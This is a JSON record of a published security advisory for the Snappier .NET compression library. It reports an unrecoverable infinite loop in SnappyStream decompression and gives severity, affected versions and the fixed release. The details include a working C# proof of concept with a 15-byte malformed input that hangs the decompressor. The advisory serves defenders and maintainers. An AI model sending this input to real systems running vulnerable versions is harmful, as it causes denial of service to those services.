{"id":"GHSA-pggp-6c3x-2xmx","summary":"Snappier has an infinite loop during SnappyStream decompression with malformed framed input","details":"### Summary\n`Snappier.SnappyStream` enters an uncatchable infinite loop when decompressing a malformed framed-format Snappy stream as small as 15 bytes.\n\n### Details\nThe hang manifests as a userspace busy loop with SnappyStreamDecompressor.Decompress repeatedly calling Crc32CAlgorithm.Append. The exact non-terminating loop in or above Decompress has not been traced further.\n\n### PoC\n```csharp\nusing System.IO.Compression;\nusing Snappier;\n\nbyte[] data = { 0x00, 0x04, 0x00, 0x00, 0x64, 0x4e, 0x6c, 0x71, 0x79, 0x20, 0x77, 0x6f, 0x72, 0x6c, 0x64 };\nusing var src = new MemoryStream(data);\nusing var snap = new SnappyStream(src, CompressionMode.Decompress);\nusing var dst = new MemoryStream();\nsnap.CopyTo(dst);   // never returns\n```\n\n### Impact\nA caller using `SnappyStream` on attacker-controlled bytes can be made to spin forever and burn a thread until the process is killed. `try/catch` around the stream operation can't recover (no exception is thrown).","aliases":["CVE-2026-44302"],"modified":"2026-05-13T16:57:26.783651Z","published":"2026-05-06T20:53:23Z","database_specific":{"github_reviewed":true,"severity":"HIGH","github_reviewed_at":"2026-05-06T20:53:23Z","cwe_ids":["CWE-835"],"nvd_published_at":"2026-05-12T22:16:36Z"},"references":[{"type":"WEB","url":"https://github.com/brantburnett/Snappier/security/advisories/GHSA-pggp-6c3x-2xmx"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44302"},{"type":"PACKAGE","url":"https://github.com/brantburnett/Snappier"}],"affected":[{"package":{"name":"Snappier","ecosystem":"NuGet","purl":"pkg:nuget/Snappier"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"1.3.1"}]}],"versions":["1.0.0","1.0.0-beta001","1.0.0-beta002","1.1.0","1.1.1","1.1.2","1.1.3","1.1.4","1.1.5","1.1.6","1.2.0","1.2.0-beta0001","1.3.0"],"database_specific":{"last_known_affected_version_range":"\u003c= 1.3.0","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-pggp-6c3x-2xmx/GHSA-pggp-6c3x-2xmx.json"}}],"schema_version":"1.7.5","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}]}